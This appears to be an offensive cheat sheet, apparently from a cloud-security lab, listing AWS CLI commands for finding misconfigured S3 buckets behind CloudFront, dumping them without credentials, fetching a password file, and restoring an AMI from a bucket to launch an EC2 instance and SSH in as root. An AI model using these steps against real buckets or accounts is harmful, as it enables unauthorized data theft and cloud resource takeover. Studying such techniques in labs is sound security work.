S3

Enumerate misconfigured CloudFront Origins for Public S3 Buckets

1) DNS Enumeration

nslookup

nslookup domain.org
nslookup IP_ADDRESS
nslookup subdomain.domain.org
nslookup assets.domain.org.s3.amazonaws.com

2) Subdomain enumeration

Google search

org: domain.org site: s3.amazonaws.com

3) Web Page Source Inspection

Right-Click -> View Page Source
CTRL+F -> s3.amazonaws.com

Exploit S3 Buckets

1) Unauthenticated S3 Bucket dumping

aws s3 sync s3://BUCKET_NAME/ . --no-sign-request

2) Bucket enumeration

aws s3 ls 

3) Download a file from a bucket

aws s3 cp s3://BUCKET_NAME/password.txt .

4) Enumerate bucket policies

aws s3api get-bucket-policy --bucket BUCKET_NAME --query Policy --output text | jq .

Exploit Services that are paired/used with S3

EC2

1) Generate AMI from image

Authenticate with AWS credentials first

aws ec2 create-restore-image-task --object-key AMI_Object_ID.bin --bucket assets.bestcloudcompany.org --name NAME

2) Create your SSH key pair

aws ec2 create-key-pair --key-name NAME_FROM_PREVIOUS_COMMAND --query "KeyMaterial" --output text > ~/.ssh/bestkeys.pem

3) Describe Subnets

Use any subnet with Tag value "SubnetA"

aws ec2 describe-subnets

4) Describe available security groups

Find a security group that allows SSH Access

aws ec2 describe-security-groups

5) Create EC2 instance from AMI

aws ec2 run-instances --image-id IMAGE_ID --instance-type t3a.micro --key-name NAME_FROM_PREVIOUS_COMMANDS --subnet-id subnet-SUBNET_ID --security-group-id sg-SECURITY_GROUP_ID

6) SSH to instance

Find the piblic IP in the AWS Console:

EC2 -> Instances -> INSTANCE_ID

ssh -i PRIV_KEY.pem root@EC2_PUBLIC_IP